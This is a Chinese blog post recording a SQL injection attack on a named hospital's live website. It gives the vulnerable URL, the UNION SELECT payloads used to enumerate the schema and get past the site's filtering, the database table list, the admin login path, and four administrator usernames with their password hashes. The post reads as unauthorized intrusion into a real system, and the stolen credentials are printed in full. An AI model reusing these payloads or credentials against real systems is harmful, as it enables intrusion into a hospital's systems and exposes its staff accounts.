142 字
1 分钟

志城医院SQL注入实战

2026-01-20
安全
SQL
/
安全
/
注入攻击
/
实战

注入点#

http://www.c-c-chen.com.tw/news_detail.php?id=1

拦截记录#

  1. /0 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name='admin_account'

    尝试替换某些字符

    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns
    

    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()
    

    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name=
    

    union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name=admin
    /0 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name="admin"
    

    union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()

    结果:/0 union select 1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database() AND table_name="admin_account"成功获取

    猜测:=''被白名单拦截

  2. /0 union select 1,2,group_concat(username,"-" ,pass_word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from c_c_chen_db.admin_account

    结果:/0 union select 1,2,group_concat(username,666,pass_word),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from c_c_chen_db.admin_account

    猜测:,""被拦截

数据结果#

数据库名

后台管理:/admin/login.php

数据表: active_news,active_news_class,active_photo,activity_rpt,activity_rpt_class,admin_account,comm_serv,comm_serv_class,doctor_data,event_photo,event_photo_pic,faq_rpt,health_area,health_area_class,health_download,health_download_class,health_download_series,learn_activity,links_rpt,medical_main_dep,medical_serv_article,medical_serv_section,medical_sub_dep,ops_timetable,personnel_download,profile_article,profile_section,profile_section_en,reg_online,ward_guide

admin_account表字段: id,username,realname,dep,job,e_mail,acc_status,start_date,end_date,pass_word,remark,authority,upd_man,upd_date,keyin_man,keyin_date

存在的username/pass_word:

admin_c_c_chen/adufirBr7JPyE

admin_chen/adS5YVLecUr.Y

drccent_medical/drxK4JQxMklN.

etantech/et7xHj0yjgUdU

文章分享

如果这篇文章对你有帮助,欢迎分享给更多人!

志城医院SQL注入实战
https://firefly.cuteleaf.cn/posts/sql/志城医院/
作者
Lireal
发布于
2026-01-20
许可协议
CC BY-NC-SA 4.0
SQL注入基础
FISCO BCOS企业级部署工具使用-多群组
© 2026 Lireal. All Rights Reserved. / RSS / Sitemap
Powered by Astro & Firefly

目录